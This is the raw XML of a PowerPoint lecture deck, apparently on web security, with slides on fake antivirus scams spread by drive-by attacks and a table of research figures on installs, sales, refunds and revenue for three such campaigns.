            <a:off x="6796721" y="1355915"/>
            <a:ext cx="5204211" cy="1501015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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C1E0F2D8-4626-41ED-808E-32CD3B882BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796721" y="2786656"/>
            <a:ext cx="5204211" cy="1143900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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9C486C05-B2BC-4C5B-AE0F-10CA9E587B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796721" y="3929821"/>
            <a:ext cx="5204211" cy="855994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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F984F751-C9FE-4303-81E7-B359E15644B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796721" y="4785815"/>
            <a:ext cx="5204211" cy="864358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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E5438AF8-61A2-4D20-BFE1-38B9D23F0998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796721" y="5920111"/>
            <a:ext cx="5204211" cy="370773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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2860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grpId="1" nodeType="click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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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arn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="2"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9" grpId="1" animBg="1"/>
      <p:bldP spid="9" grpId="2" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="1" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="1" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="1" animBg="1"/>
      <p:bldP spid="14"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0986"/>
            <a:ext cx="10515600" cy="1110018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Antivirus Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1407969"/>
            <a:ext cx="10856495" cy="589274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake antivirus software is another common drop during drive-by attacks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4603" y="1997243"/>
            <a:ext cx="5953260" cy="4827385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7940839" y="5582652"/>
            <a:ext cx="2859507" cy="1030063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -117660"/>
              <a:gd name="adj2" fmla="val -517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Clicking here will prompt you to buy a subscription</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7940839" y="2244853"/>
            <a:ext cx="2859507" cy="1030063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70114"/>
              <a:gd name="adj2" fmla="val 183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Warning dialog looks legitimate at first glance…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7940838" y="3895903"/>
            <a:ext cx="2859507" cy="1030063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90310"/>
              <a:gd name="adj2" fmla="val 172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OMG, look at all those nasty viruses!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240909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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Researchers used dynamic analysis tools to identify URLs from fake AV software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointed to 21 unique servers hosting infrastructure for the scams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Researchers contacted the hosting providers and got them to take the servers down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowed researchers to image the hard drives :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data records purchases, returns, etc. for 3 fake AV campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>March 2008 – April 2010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15085099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267"/>
            <a:ext cx="10515600" cy="918948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake AV by the Numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="300790" y="1321813"/>
          <a:ext cx="11545936" cy="3606800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1366647">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1922272">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1078544">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1239253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1505077">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1508443">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1417257">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1508443">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Campaign</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Subscriptions</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Purchase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Rate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Total Installs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Total Sales/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Conversion %</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Revenue</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Refunds/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Chargebacks</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Net</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>AV1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(3 months)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>6 months - $49.95</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>34.8%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>8,403,008</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>189,342</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(2.4%)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$11,303,494</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5,669</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1,544</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$10,862,492</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ct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1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> year – $59.95</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>32.9%</a:t>
                      </a:r>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r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2 year -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> $69.95</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>32.3%</a:t>
                      </a:r>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10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>AV2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(16 months)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>6 months - $49.95</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>61.9%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>6,624,508</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>137,209</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(2.1%)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$5,046,508</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>11,681</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3,024</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$4,103,735</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1 year - $69.95</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>13.5%</a:t>
                      </a:r>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r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Lifetime - $89.95</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>24.6%</a:t>
                      </a:r>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10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>AV3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(30 months)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1 year - $79.90</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>83.2%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>91,305,640</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1,969,953</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(2.2%)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$116,941,854</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>151,553</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>30,743</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$103,765,233</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Lifetime - $99.90</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>16.8%</a:t>
                      </a:r>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478981" y="5536187"/>
            <a:ext cx="11234037" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Each campaign paid out millions of dollars to affiliates (spammers) for acquiring traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EDAD94C-80A9-46D8-8E9F-AA65C8D7432D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254895" y="1216019"/>
            <a:ext cx="4476329" cy="3797259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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8C6D8964-E875-4DC2-B687-077E7CC21644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601707" y="1216018"/>
            <a:ext cx="2895463" cy="3797259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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96BAD060-7F57-4BEE-81F2-90A72CDC1584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
